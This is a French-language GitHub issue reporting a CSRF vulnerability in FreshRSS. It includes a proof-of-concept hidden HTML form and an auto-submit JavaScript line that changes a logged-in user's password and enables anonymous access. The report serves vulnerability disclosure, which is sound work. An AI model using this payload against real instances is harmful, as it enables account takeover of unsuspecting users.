[Sécurité] Vulnérabilité de type CSRF pour changer le password

Hello,

Il semblerait que FreshRSS soit vulnérable à une attaque de type CSRF (Cross Site Request Forgery). 
En effet, il est possible de créer un formulaire du type: 

``` html
<form action="hxxps://rss.monflux.fr/i/?c=users&a=auth" id="exploit">
<input type="hidden" name="passwordPlain" value="omgwtfbbq">
<input type="hidden" name="mail_login" value="">
<input type="hidden" name="auth_type" value="form">
<input type="hidden" name="anon_access" value="1">
<input type="hidden" name="token" value="">
</form>
```

Et de l'auto-soumettre à l'aide de JavaScript. 

``` js
HTMLFormElement.prototype.submit.call($('#exploit')[0]);
```

L'attaque se base sur le fait que l'utilisateur est connectée sur FreshRSS & navigue sur le Net en même temps (ou visualise une news qui comprend du code malicieux). 
Dès chargement de la page, le mot de passe de l'utilisateur courant est changé. 


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[Sécurité] Vulnérabilité de type CSRF pour changer le password #554

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

[Sécurité] Vulnérabilité de type CSRF pour changer le password #554

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions